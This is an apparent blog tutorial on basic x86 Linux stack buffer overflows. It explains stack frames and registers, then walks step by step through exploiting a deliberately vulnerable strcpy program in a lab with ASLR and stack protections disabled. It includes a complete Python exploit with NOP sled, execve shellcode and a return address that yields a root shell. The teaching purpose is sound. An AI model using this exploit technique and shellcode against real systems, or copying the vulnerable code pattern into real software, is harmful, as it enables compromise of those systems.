An Introduction into Linux Buffer Overflows

Today we are going to learn how to exploit a buffer overflow vulnerability in Linux. We aren’t going to get into fancy stuff like ASLR bypass or Return Oriented Programming; instead, we are going to stick to the basics. Everyone needs to start somewhere, right? Consider this post our baby steps into the world of binary exploitation.

We are just going to exploit the hell out of a poor ELF binary using gdb. If you don’t know, GDB is the GNU Debugger, a command line debugging utility that allows us to dynamically debug a program. GDB lets us do cool stuff like viewing the values on the stack and in the registers while a program runs, and controlling the program’s execution flow.

Before we begin, I would like to express my immense gratitude towards Sam Bowne for creating such a comprehensive and in-depth guide on Linux buffer overflows.

Note: This tutorial uses Python 2.7 for simplicity.

If you want to know how to develop exploits using Python 3, see my writeup for IMF, which deals with raw bytes in Python 3 and solves the “0x90c290c2” problem.

Let’s get started.

Theory

Buffer Overflows 

Buffer overflow is probably the best-known form of software security vulnerability. Most software developers know what a buffer overflow vulnerability is, but buffer overflow attacks against both legacy and newly-developed applications are still quite common.  

A buffer is a region of memory used to temporarily store data while it is being moved from one place to another. For example, consider streaming a video from YouTube. Without a buffer, playback depends entirely on how smoothly the data arrives. But data transfer is prone to errors, and lost data sometimes has to be retransmitted, which delays its arrival. So, video streaming without a buffer would suffer from jerky playback. With a buffer to hold the incoming data, we only have to wait a brief moment for the buffer to fill, and after that the playback will be smooth, without frozen frames.

Buffers have a fixed length, and programs usually expect the input to fit within the buffer size. But if the software developer didn’t implement proper validation of the input, an oversized input will be copied into the undersized buffer, which leads to a condition called a Buffer Overflow.

There are two types of buffer overflows: stack-based and heap-based. For simplicity, we will be discussing x86 stack-based buffer overflows. In a classic stack-based buffer overflow exploit, the attacker sends specially crafted input containing shellcode to a program, which stores it in an undersized stack buffer. The stack buffer cannot hold the excess data, so it spills over into the adjacent memory locations, overwriting critical values such as saved pointers and the function’s return address, and thereby leading to code execution.
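To make the idea concrete, here is a toy Python 3 model of the situation. It is only a sketch, not real exploitation code: the frame layout (a 16-byte buffer immediately followed by a 4-byte saved return address), the example address and the helper names make_frame and unchecked_copy are all made up for illustration.

```python
import struct

BUFFER_SIZE = 16  # made-up buffer size for this toy model


def make_frame(return_address):
    """Return a toy frame: an empty buffer followed by the saved return address."""
    return bytearray(BUFFER_SIZE) + bytearray(struct.pack("<I", return_address))


def unchecked_copy(frame, data):
    """Copy data into the frame byte by byte with no length check, like strcpy."""
    for index, byte in enumerate(data):
        frame[index] = byte


def saved_return_address(frame):
    """Read back the 4 bytes that sit right after the buffer."""
    return struct.unpack("<I", frame[BUFFER_SIZE:BUFFER_SIZE + 4])[0]


frame = make_frame(0x08048456)             # hypothetical return address
unchecked_copy(frame, b"A" * 12)           # fits inside the buffer
print(hex(saved_return_address(frame)))    # return address is untouched

unchecked_copy(frame, b"A" * 16 + b"BBBB") # 4 bytes too many
print(hex(saved_return_address(frame)))    # return address is now our B's
```

The second copy writes past the 16-byte buffer, so the four B's land exactly where the return address lives. That is the whole trick behind the exploit we build in this post.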

To understand buffer overflows better, let’s briefly explain how data is stored in and retrieved from memory, what registers are, and how an application uses the stack and the heap.

Registers 

A register is a small storage location within the CPU, intended to hold small amounts of data temporarily. Registers are tiny: depending on the architecture, a register can be 8, 16, 32 or 64 bits wide, or even more. Registers can hold memory addresses, instructions or just plain data. Think of registers as sitting above the caches in the memory hierarchy: smaller and faster than any cache.

 

Memory Hierarchy demonstrated 

There are different types of registers, namely general registers, control registers, segment registers, data registers, pointer registers and index registers. We won’t be talking about all of them; we will only cover the registers related to stack operations: ESP, EBP and EIP. Here is what they are and what they do.

ESP (Extended Stack Pointer) – Stores the memory address of the current top of the stack (the topmost element)

EBP (Extended Base Pointer) – Stores the memory address of the base (start) of the current stack frame

EIP (Extended Instruction Pointer) – Stores the memory address of the next instruction to be executed

We will explain their functions in the stack section. 

Memory Layout 

Memory layout demonstrated 

The primary memory (RAM) is arranged as a matrix, in which data can be stored temporarily. But it is difficult and complex to use this matrix as is. So, the operating system lays out a process’s memory in a logically understandable structure known as the memory layout, as demonstrated in the above image. The memory layout has different segments. They are:

  • Kernel Space – Memory reserved for the kernel, which user programs cannot access directly. Command line arguments and environment variables sit just below it, at the top of the stack region. 
  • Stack – Stores function call data such as local variables, function arguments and return addresses. 
  • Heap – Stores dynamically allocated data. 
  • Uninitialized Data/BSS (Block Started by Symbol) – Holds uninitialized global and static variables, which the kernel initializes to zero. 
  • Initialized Data – Contains initialized global and static variables which have a pre-defined value and can be modified. 
  • Text – Read-only space where the machine language instructions are stored. 

We would be getting off the subject if we discussed all the components listed above. Since our topic is stack-based buffer overflows, we will only elaborate on the operations of the stack.

Stack 

A stack is a data structure that stores the temporary variables created by an application in the computer’s memory. The stack is a LIFO (Last In First Out) data structure, where the most recently stored data is accessed first. Local variables are created on the stack at runtime, when their function is called. When the function finishes, the memory used by those variables is released automatically. New data can only be added on top of previously stored data, and data can only be removed from the top of the stack. Adding data to the stack is called a push operation and removing data is called a pop operation.

Push and Pop Operations of a Stack 

Normally a stack grows upwards when new data is added. But in the memory layout, we have an inverted stack located just under the kernel space, and its growth is downwards; that is, from higher memory addresses to lower memory addresses.
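The downward growth is easier to see in code. Below is a small Python 3 sketch of a 32-bit stack; the ToyStack class, its 64-byte size and the starting address 0xC0000000 are assumptions chosen only for illustration. The point to watch is that push moves ESP to a lower address and pop moves it back up.

```python
import struct


class ToyStack:
    """A tiny model of a downward-growing stack of 4-byte values."""

    def __init__(self, top_address=0xC0000000, size=64):
        self.top = top_address           # highest address, where the stack starts
        self.base = top_address - size   # lowest address the toy stack may use
        self.memory = bytearray(size)
        self.esp = top_address           # empty stack: ESP sits at the very top

    def push(self, value):
        if self.esp - 4 < self.base:
            raise OverflowError("toy stack is full")
        self.esp -= 4                    # growing the stack LOWERS the address
        offset = self.esp - self.base
        self.memory[offset:offset + 4] = struct.pack("<I", value)

    def pop(self):
        if self.esp >= self.top:
            raise IndexError("toy stack is empty")
        offset = self.esp - self.base
        value = struct.unpack("<I", self.memory[offset:offset + 4])[0]
        self.esp += 4                    # shrinking the stack RAISES the address
        return value


stack = ToyStack()
stack.push(0x11111111)
stack.push(0x22222222)
print(hex(stack.esp))    # two pushes: ESP is 8 bytes below where it started
print(hex(stack.pop()))  # last in, first out
```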

The stack is also called the Call Stack, since it is mainly used for returning execution control from subroutines (functions) once they have finished executing.

A stack can contain one or more Stack Frames. Stack frames will be discussed below. 

Stack vs Heap 

The stack mostly holds function call information: local variables, function arguments and return addresses. Stack memory is allocated automatically. The space a function needs is worked out at compile time and reserved when the function is called, so the programmer never requests or frees it by hand. Because of this, the stack has a limited amount of memory available. Compared to the heap, data access on the stack is faster, since data is stored consecutively.

The heap is the memory space a program uses for dynamic memory allocation, that is, memory requested at runtime (for example with malloc in C). Global variables do not live here; they are stored in the initialized data and BSS segments listed earlier. Because allocations are made on demand, the heap is not bound by the stack’s size limit. Data access on the heap is relatively slower than on the stack, since data is not stored consecutively.

Stack Frames 

Stack frames, also known as activation records or activation frames, can be considered mini stacks within the original stack, each containing all the variables and information required by one function call. When a function call occurs, a new stack frame holding the function’s parameters, the return address, saved register values and local variables is created in stack memory. For each function call, a new stack frame gets created. As we said earlier, a stack consists of one or more stack frames. Let’s take a look at the structure of a stack frame.

A diagram explaining the layout of Stack frames

 

There are two main pointers in a stack frame: the Stack Pointer (ESP) and the Base Pointer (EBP), also called the Frame Pointer. The stack pointer points to the top of the stack, and the base pointer marks the base of the currently active stack frame. The memory location that EBP points to holds the saved base pointer of the previous (calling) function, so the frames form a chain.

Whenever a new element is pushed onto the stack, ESP is decremented (remember, the stack grows towards lower addresses), so it always points to the top of the stack. Once the execution of a function is over, the stack frame is destroyed and the execution flow is returned to the previous function. Destroying a stack frame is done by setting ESP (top of the stack) to EBP (base of the frame) and restoring the caller’s saved EBP. The execution flow is returned by loading the return address into EIP.

#include <stdbool.h> 
#include <stdio.h> 

// function to check that two numbers are not negative 
bool checkPositive(int a, int b) 
{ 
    return (a >= 0 && b >= 0); // true if both are >= 0; else false 
} 

int add(int x, int y) 
{ 
    bool check = checkPositive(x, y); 
    int sum = 0; 

    if (check) 
    { 
        sum = x + y; 
        return sum; // if check is true, return the sum of x and y 
    } 
    return -1; // if check is false, return the error value -1 
} 

int main() 
{ 
    int a = 5, b = 10; 
    int c = add(a, b); 
    printf("Sum is : %d", c); 
    return 0; 
} 

C program to demonstrate function of Call Stack 

For example, consider the above C program, which adds two positive numbers, a=5 and b=10. The program starts with the main function, which is called by the C runtime. Here, the main function has two initialized variables, a and b. So, a stack frame for the main function gets created in stack memory with the initialized variables and the return address into the C runtime (because the main function was called by the C runtime). The variable c is defined by the output of the add() function.

So, we’ve called the add(a,b) function from the main function to add the two numbers, passing the variables to it as arguments. This is a subroutine call from the main function, so the execution control needs to be transferred from the main function to the add function. Thus, the execution of the main function gets halted temporarily and the execution control gets transferred to the add function. Now, a new stack frame for the add function gets created with the passed arguments and the return address into the main function (because the add function was called by the main function).

Diagram demonstrating the execution control flow between Stack Frames

 

Inside the add function, there is a boolean variable check, whose value is determined by another function called checkPositive(). So, checkPositive(x,y) gets called from the add function to check whether the two numbers are positive. This is another subroutine call, but this time from the add function. So, the execution control needs to be transferred from the add function to the checkPositive function. Thus, the execution of the add function gets halted temporarily and the execution control gets transferred to the checkPositive function. Now, a new stack frame for the checkPositive function gets created with the passed arguments and the return address into the add function (because the checkPositive function was called by the add function).

Inside the checkPositive function, there is a simple condition that checks whether both passed arguments are non-negative. If they are, it returns true; else, it returns false. Since a=5 and b=10, the checkPositive function will return true. It hands the result and the execution control back to the add function using the return address in its stack frame, and the stack frame of checkPositive gets destroyed.

Now the execution control is back with the add function, and its halted execution resumes. The check variable gets assigned true, the result returned by checkPositive.

The add function now has a simple condition: if the check variable is true, return the sum of x and y; else, return -1. Since check is true, the sum (15) and the execution control get returned to the main function, and the stack frame of add gets destroyed.

Now the execution control is back with the main function, and its halted execution resumes. The variable c gets assigned 15, the result returned by add.

The main function will print Sum is : 15, then return 0 and the execution control to the C runtime. The stack frame of main gets destroyed and the execution of the C program is complete.
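The walkthrough above can be replayed with a short Python 3 sketch. It mirrors the C program but keeps its own list of frame names, recording a snapshot on every call and return. The enter and leave helpers are hypothetical bookkeeping added for this illustration; a real call stack stores arguments, saved registers and return addresses, not names.

```python
call_stack = []  # the last element is the top of the stack
trace = []       # a snapshot of the stack after every call and return


def enter(name):
    """Record that a new frame was pushed for the named function."""
    call_stack.append(name)
    trace.append(list(call_stack))


def leave():
    """Record that the top frame was destroyed on return."""
    call_stack.pop()
    trace.append(list(call_stack))


def check_positive(a, b):
    enter("checkPositive")
    result = a >= 0 and b >= 0
    leave()
    return result


def add(x, y):
    enter("add")
    total = x + y if check_positive(x, y) else -1
    leave()
    return total


def main():
    enter("main")
    c = add(5, 10)
    leave()
    return c


result = main()
for snapshot in trace:
    print(" > ".join(snapshot) or "(empty)")
print("Sum is :", result)
```

The snapshots grow from main to main > add > checkPositive and then shrink again in reverse order, which is exactly the last-in, first-out behaviour described above.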

A word on EIP 

We have discussed that we use the return address of a stack frame to return to the previous function once the current function’s execution is finished. To understand that, we have to know about a register called EIP (Extended Instruction Pointer). EIP is also called the program counter, as it stores the memory address of the next instruction to be executed once the current instruction is done. So, once the execution of the current function is finished, the return address saved in its stack frame is loaded into EIP. Thus, the CPU redirects the execution flow back to the previous function.

Now that we have discussed the operations of the stack and the related terminology, let’s jump into the exciting part: the actual buffer overflow exploitation.

Before going on with buffer overflow exploitation in Linux, we have some prerequisites to take care of. Set up your lab with the software and configuration listed below before proceeding further.

Prerequisites 

  • An x86 Kali Linux machine with ASLR disabled (a virtual machine is preferred) 
  • Vulnerable C program from here
  • Python 2.7 (Included in Kali) 
  • GNU project Debugger (GDB) for debugging (Included in Kali) 
  • GNU Compiler Collection (GCC) for compiling C files (Included in Kali) 
  • Python Exploit Development Assistance (peda) for GDB from here

Configuration 

  • Disabling ASLR on Kali Linux 

In a terminal, enter the following command to check the ASLR status.

cat /proc/sys/kernel/randomize_va_space 

There are three numbers representing ASLR states. 

0 = Disabled 

1 = Conservative Randomization 

2 = Full Randomization 

By default, ASLR will be set to Full Randomization. If this is the case, then the output of the above command will be 2.

Use the following command (as root) to disable ASLR, then verify the change by running the above command once again.

echo 0 > /proc/sys/kernel/randomize_va_space
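
If you would rather check the setting from a script, the following Python 3 sketch reads the same file and translates the number using the three states listed above. The function names describe_aslr and read_aslr_state are made up for this example, and read_aslr_state only works on a Linux system where that file exists.

```python
ASLR_STATES = {
    0: "Disabled",
    1: "Conservative Randomization",
    2: "Full Randomization",
}


def describe_aslr(raw_value):
    """Translate the text read from randomize_va_space into a description."""
    try:
        return ASLR_STATES.get(int(raw_value.strip()), "Unknown")
    except ValueError:
        return "Unknown"


def read_aslr_state(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current ASLR setting from the kernel (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())


print(describe_aslr("2\n"))  # what a default system would report
```

On the lab machine, calling read_aslr_state() after the echo command should report Disabled.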

 

  • Python Exploit Development Assistance (peda) for GDB  

GDB is a free and open source command line debugger for reverse engineering executables. GDB is an extremely powerful and flexible tool for reverse engineering enthusiasts all around the world and it supports several programming languages.  

PEDA is an extension to the normal GDB. PEDA adds a ton of useful features to GDB, making the debugging easier. Some features of PEDA are listed below: 

  • Colorise gdb terminal – Easier reading 
  • aslr – Show/set ASLR setting of GDB 
  • checksec – Check for various security options of binary 
  • dumpargs – Display arguments passed to a function when stopped at a call instruction 
  • dumprop – Dump all ROP gadgets in specific memory range 
  • elfheader – Get headers information from debugged ELF file 
  • elfsymbol – Get non-debugging symbol information from an ELF file 
  • lookup – Search for all addresses/references to addresses which belong to a memory range 
  • patch – Patch memory start at an address with string/hexstring/int 
  • pattern – Generate, search, or write a cyclic pattern to memory 
  • procinfo – Display various info from /proc/pid/ 
  • pshow – Show various PEDA options and other settings 
  • pset – Set various PEDA options and other settings 
  • readelf – Get headers information from an ELF file 
  • ropgadget – Get common ROP gadgets of binary or library 
  • ropsearch – Search for ROP gadgets in memory 
  • searchmem|find – Search for a pattern in memory; support regex search 
  • shellcode – Generate or download common shellcodes. 
  • skeleton – Generate python exploit code template 
  • vmmap – Get virtual mapping address ranges of section(s) in debugged process 
  • xormem – XOR a memory region with a key 
Colourized GDB Terminal with PEDA 

Using a CLI debugger rather than a GUI debugger can feel counterintuitive and overwhelming to a beginner, but don’t worry too much. GDB is very intuitive once you get the hang of it, is free and open source, has simple commands and is more powerful than most of its GUI counterparts.

GDB comes preinstalled with Kali Linux, so it needs no configuration. But we do have to install and configure PEDA to work with GDB.

To do that, clone PEDA and register it in GDB’s startup file by using the following commands.

git clone https://github.com/longld/peda.git ~/peda 
echo "source ~/peda/peda.py" >> ~/.gdbinit 

That’s it! The installation is done and PEDA is integrated with GDB.

The exploitation phases are exactly the same as we discussed with the Windows buffer overflow exploitation.  

  • Compiling Vulnerable C script with -NO-PIE and EXECSTACK Flags 

A Position-Independent Executable, or PIE, can be executed at any memory address without modification, unlike absolute code, which must be loaded at a specific memory location to execute.

PIE ensures the correct application of ASLR protection. If PIE is not enabled when an application is compiled, full ASLR cannot be achieved, which can lead to security issues.

For this exercise, we have disabled ASLR and we are going to build an executable without PIE. We can disable PIE by using the -no-pie flag while compiling.

Also, executing code from stack memory is disabled by default as a data execution prevention mechanism. We can turn this protection off by using the -z execstack flag while compiling.

Below is the vulnerable code for the buffer overflow experiment, obtained from the Samclass tutorial.

#include <string.h> 
#include <stdio.h> 

int copier(char *str){ 
char buffer[100]; 
strcpy(buffer, str); 
}

void main(int argc, char *argv[]) { 
copier(argv[1]); 
printf("Done!\n"); 
} 

Save this code as bof.c on our Kali machine, and enter the following command to compile it into an ELF (Executable and Linkable Format) file with PIE disabled and an executable stack.

gcc -g -z execstack -no-pie -o bof bof.c 

If compilation was successful without any errors, then there will be an ELF file named bof in the current directory.

We can execute this program by using ./bof. 

Exploitation Begins

  1. Fuzzing 

Now that we’ve got the executable to test the buffer overflow, the next step is to fuzz the executable to find the buffer length. But since we have the source code of the executable, we know that the buffer is 100 characters long.

Our vulnerable program accepts a string as an argument, uses the strcpy function to copy the argument into the buffer and then prints Done!

So, let’s use more than a hundred characters, say 120, to see if we can overflow the buffer.

Create a string 120 characters long using a Python one-liner like the one below. Enter the command in the terminal.

python -c 'print "A"*120' 

Now, copy the 120 A’s and pass it as an argument to our bof executable. 

./bof AAAAAAA… 

Great! We’ve successfully overflowed the buffer of bof.
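
When the source code is not available, the length has to be found by trial and error. Here is a rough Python 3 sketch of how that could be automated; it is not part of the original walkthrough. The helper name find_crash_length and the start, stop and step values are arbitrary assumptions. It relies on subprocess reporting a negative return code when a process is killed by a signal on Linux.

```python
import signal
import subprocess


def find_crash_length(command, start=100, stop=200, step=4):
    """Return the first argument length that kills `command` with SIGSEGV.

    `command` is a list such as ["./bof"]; the string of A's is appended
    as its last argument. Returns None if nothing in the range crashes it.
    """
    for length in range(start, stop + 1, step):
        result = subprocess.run(
            command + ["A" * length],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        # On POSIX a negative return code means "terminated by that signal".
        if result.returncode == -signal.SIGSEGV:
            return length
    return None
```

In the lab this would be called as find_crash_length(["./bof"]). The length it reports only tells us roughly where the program starts crashing; the exact EIP offset still has to be located with a unique pattern.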

  2. Locating EIP offset 

We have to create a simple python script before we get into gdb, so that it’s easier to modify the arguments. Save the below line as arg.py. 

print 'A' * 120 

Now we can get into gdb to find the exact offset of the EIP. Enter the following command to start gdb. 

gdb -q ./bof 

With the above command, you should see output like the one below.

GDB is now up and running. GDB has a nifty feature: it can list the source code of a binary if that binary was compiled with debug information (the -g flag we used).

We can check whether a binary is stripped or not by using the file command in the terminal.

file bof

Since our binary is not stripped of debug information, we can use the list command to list the lines of the source code from the binary.

Enter the list command inside gdb to list the source code of the file. 

This is pretty handy for setting up breakpoints at a certain line before the execution starts.

Let’s go ahead and set up a breakpoint after the strcpy function, since that’s where the buffer overflow happens. We can see that strcpy is at line number 9, so let’s set up a breakpoint at line 10, so that we can observe the register contents right after the overflow.

break 10 

Now, we can run the bof binary inside the gdb and see what happens to the registers when the crash occurs. 

To run the binary, type run followed by the arguments to pass to the binary. For example, to send 120 A’s as the argument to the bof binary, we can use the following command inside gdb.

run $(python arg.py) 

After this command, gdb is going to halt the program at the breakpoint we set and display the state of the registers. It’s a full page of output, but since we’ve installed PEDA, the output is less threatening and easy to read. We are looking for the series of A characters we passed as the argument.

The output of the above command is given below. 

GDB output after crash

We can see from the output that ESP (at the top) and Stack (at the bottom) are filled with our A’s, but not EIP. This is because the program is halted at the breakpoint. 

If you look at the bottom of the output, we can see gdb telling us that Breakpoint 1 has been reached and the program is paused there.

Enter c to continue the execution and observe the output now. The output after the crash is given below. 

Look at the bottom of gdb. It is displaying the stopped reason as SIGSEGV. It means a Segmentation Violation signal has been raised and the program has stopped. SIGSEGV is commonly known as a Segmentation Fault.

Now, check the registers. We can use the info registers command to focus just on the registers.

Observe the contents of EIP. It is 0x41414141; 0x41 is the hexadecimal ASCII value for A, so EIP holds four of our A’s. That means we have successfully managed to overwrite the EIP register.

The next step is to locate the exact offset of the EIP, so that we can place a memory address of our choice exactly where EIP gets overwritten. Just like before, we need to generate a unique string, and we can use the following command in gdb to achieve that.

pattern create 120 

Here 120 means the length of the pattern. 

Copy the pattern, open arg.py, comment out the previous line and paste the pattern into the script, so that our script looks like the one below.

Now, let’s run the bof again in gdb with the same command as before. 

Notice the contents of the EIP, which translate to AA8A.

Now, we can use the pattern search command inside gdb to search for the offset. 

pattern search AA8A

GDB has found the EIP offset at 112. Great!
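
If you are curious how a pattern search works under the hood, here is a minimal Python 3 sketch of the idea. Note that it does not reproduce PEDA's pattern: it builds a simpler Aa0Aa1Aa2 style pattern as a stand-in, and the function names cyclic_pattern and offset_from_eip are made up for this example. The principle is the same: every 4-byte chunk of the pattern is unique, so the chunk that lands in EIP reveals its own position.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length):
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    chunks = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("requested pattern is longer than this scheme supports")


def offset_from_eip(eip_value, pattern):
    """Find where the 4 bytes seen in EIP occur inside the pattern.

    EIP is a little endian register, so the value is unpacked back into
    the byte order it had in memory before searching. Returns -1 if the
    bytes are not part of the pattern.
    """
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern.find(needle)


pattern = cyclic_pattern(120)
# Pretend the program crashed with bytes 112..115 of the pattern in EIP.
fake_eip = struct.unpack("<I", pattern[112:116].encode("ascii"))[0]
print(offset_from_eip(fake_eip, pattern))
```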

  3. Controlling EIP 

Now that we know the exact offset, we can craft our Python script in such a way that the EIP will be overwritten with four B’s. If this happens, then we have complete control over the EIP.

But as a common practice, we will also include a NOP sled to ensure smooth execution.

Modify the arg.py script as shown below and run bof in gdb.

Modified arg.py script 
EIP written with four B’s 

We can see that EIP is cleanly overwritten with four B’s. Sweet! So, we have complete control over the EIP position. 
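
For readers following along on Python 3, here is a hedged sketch of what such a control test can look like. The layout is an assumption: a 50-byte NOP sled (the length used in the final script later in this post), A's as filler up to offset 112, then four B's. The function names control_payload and emit are invented for this example.

```python
import sys

OFFSET = 112    # EIP offset reported by pattern search
NOP_COUNT = 50  # assumed sled length, matching the final script in this post


def control_payload():
    """NOP sled, then A's up to the offset, then four B's meant for EIP."""
    sled = b"\x90" * NOP_COUNT
    filler = b"A" * (OFFSET - NOP_COUNT)
    return sled + filler + b"BBBB"


def emit(payload):
    """Write the raw bytes to stdout without any text encoding."""
    sys.stdout.buffer.write(payload)


payload = control_payload()
print(len(payload), payload[OFFSET:])
```

In Python 3 the payload has to be written with emit(payload) rather than print, because printing the string '\x90' encodes it as the two bytes c2 90, which is where the “0x90c290c2” problem mentioned at the start comes from.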

  4. Locating Space for Shellcode 

The next step is to find space to store our shellcode. For that, look at the register contents given in the output above.  

Let’s take a deeper look at contents of ESP, by using the following command. 

x/500x $esp 

This will display 500 hexadecimal values starting from ESP.

We can see several memory addresses that point to the NOP sled and the A’s we sent. This is great.

Since we’ve disabled ASLR and this executable is not PIE, we can place any of these memory addresses directly in EIP to redirect the execution flow.

We are going to choose a memory address that points into our NOP sled for ensuring smooth execution. We are selecting the address 0xbffff414, which points into the NOP sled. Now, let’s overwrite EIP with the memory address 0xbffff414 to redirect execution onto the stack.

Keep in mind that we have to write the address in little endian format, since x86 CPUs (both Intel and AMD) are little endian: the least significant byte is stored first. So, 0xbffff414 becomes '\x14\xf4\xff\xbf'.
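
Reversing the bytes by hand is error-prone, so it is worth knowing that Python's struct module can do the conversion. The snippet below is a small Python 3 sketch; the helper name to_little_endian is made up, while struct.pack and its "<I" format (little endian, unsigned 32-bit integer) are part of the standard library.

```python
import struct


def to_little_endian(address):
    """Pack a 32-bit address into the byte order x86 expects in memory."""
    return struct.pack("<I", address)


def from_little_endian(raw):
    """Turn 4 bytes read from memory back into an address."""
    return struct.unpack("<I", raw)[0]


packed = to_little_endian(0xbffff414)
print(packed)
print(hex(from_little_endian(packed)))
```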

Now, modify arg.py as shown below.

Now in gdb, enter break *0xbffff414 and run the program. When the breakpoint is hit, check the EIP register.

We can see that, EIP points to 0xbffff414 memory address, which refers to the NOP sled we sent! Perfect! We’ve successfully redirected the EIP to our desired location. 

  5. Obtaining Shellcode 

After redirecting the EIP, the next step is to obtain a shellcode. 

We are going to use the shellcode obtained from the Samclass website for generating a Dash shell. 

shellcode = ( '\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' + '\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' + '\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80' )

The above shellcode will spawn a dash shell on execution. Since we are already working as root in Kali Linux, this doesn’t gain us much; but it is a PoC (Proof of Concept) that our exploit works.

Let’s incorporate this shellcode in our arg.py script, so that our script looks like the one shown below.

#!/usr/bin/python 

NOP = '\x90' * 50 
shellcode = ( '\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' + '\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' + '\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80' ) 

filler = 'A' * (112 - 50 - 32) # offset 112 minus the 50-byte NOP sled and the 32-byte shellcode 
eip = '\x14\xf4\xff\xbf' # 0xbffff414 in little endian 
print NOP + shellcode + filler + eip
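
The arithmetic in the script is easy to get wrong when the sled or the shellcode changes, so below is a hedged Python 3 sketch of the same layout with a couple of sanity checks added. The build_payload function and its checks are additions for illustration, not part of the original script. The NUL byte check exists because strcpy stops copying at the first zero byte, so a payload containing one would be cut short.

```python
import struct

SHELLCODE = (
    b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
    b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
    b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
)


def build_payload(offset, nop_count, shellcode, return_address):
    """Lay out NOP sled + shellcode + filler so the address lands at `offset`."""
    filler_length = offset - nop_count - len(shellcode)
    if filler_length < 0:
        raise ValueError("NOP sled and shellcode do not fit before the offset")
    payload = (
        b"\x90" * nop_count
        + shellcode
        + b"A" * filler_length
        + struct.pack("<I", return_address)  # little endian, as x86 expects
    )
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would stop there")
    return payload


payload = build_payload(112, 50, SHELLCODE, 0xbffff414)
print(len(SHELLCODE), len(payload))
```

With the values from this post the shellcode is 32 bytes and the whole payload is 116 bytes: 112 bytes up to the offset plus the 4-byte address.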

Now, let’s run this in gdb. 

Notice that this time our program didn’t crash and the bof executable is now executing dash. Also, the prompt now shows #, indicating a root shell.

  6. Improving Exploit Reliability 

Type in id and we’ll get back the user id and group id of the current user; i.e., root.

It worked as we expected. But it is exiting after entering a single command. This can sometimes occur with exploits, so let’s run this one more time, but this time directly in the terminal. 

We can see that the exploit that just worked in gdb and spawned us a root shell is now behaving badly! What could be the issue?

Turns out, the gdb environment and the actual environment the application runs in differ slightly. Here, the issue is that gdb sets two environment variables, LINES and COLUMNS, to display its output on the terminal properly.

This is great for pretty output, but bad for exploit development, where the stack layout is sensitive to such changes: environment variables are stored on the stack, so extra variables shift the addresses of everything below them.
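
To get a feel for the size of that shift, here is a rough Python 3 estimate. It is only a sketch under simplifying assumptions: it counts the bytes of the NAME=value strings plus their terminating NUL and ignores alignment and everything else that lives at the top of the stack. The variable values below (24 lines, 80 columns, and the sample HOME and PATH) are made-up examples.

```python
def environment_bytes(env):
    """Bytes used by 'NAME=value' strings, each followed by a NUL byte."""
    return sum(
        len(name.encode()) + 1 + len(value.encode()) + 1
        for name, value in env.items()
    )


shell_env = {"HOME": "/root", "PATH": "/usr/bin:/bin"}  # sample values
gdb_env = dict(shell_env, LINES="24", COLUMNS="80")     # what gdb adds

shift = environment_bytes(gdb_env) - environment_bytes(shell_env)
print(shift)
```

A difference of a couple of dozen bytes is enough to move our buffer, which is why an address that works inside gdb can miss outside it. Other differences between the two environments, such as the path used to start the program, can shift the stack as well.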

We can see the variables set by gdb and by Linux itself by using the following command.

show environment 

So, let’s unset the variables set by gdb inside gdb by using the following commands. 

unset environment LINES 
unset environment COLUMNS 

Now, we can check whether the variables are unset by using the show environment command again.

Good. Now that the variables have been unset, let’s see the location of the shellcode on the stack.

We can see that the shellcode location has changed slightly. Even though the address 0xbffff414 still falls in the NOP sled here, the slight variation in the stack makes it unreliable outside gdb. So, let’s select a different memory address. Let’s choose the memory address 0xbffff420 this time.

Update the new address in script and run it in gdb first. 

Again, we got the shell, but it exited immediately after executing the first command. Let’s check this in the terminal.

Neat! Now we’ve got a reliable shell and we have successfully exploited the bof file. 

Keep in mind that stack buffer overflows are just the tip of the iceberg. There are more advanced techniques like heap overflows and ROP (Return Oriented Programming), as well as ways of bypassing memory protection mechanisms like ASLR, NX/DEP, PIE, stack canaries and FORTIFY_SOURCE.

But understanding how buffer overflows work and the techniques used for gaining code execution is the core concept in binary exploitation. A more detailed explanation of buffer overflows can be found here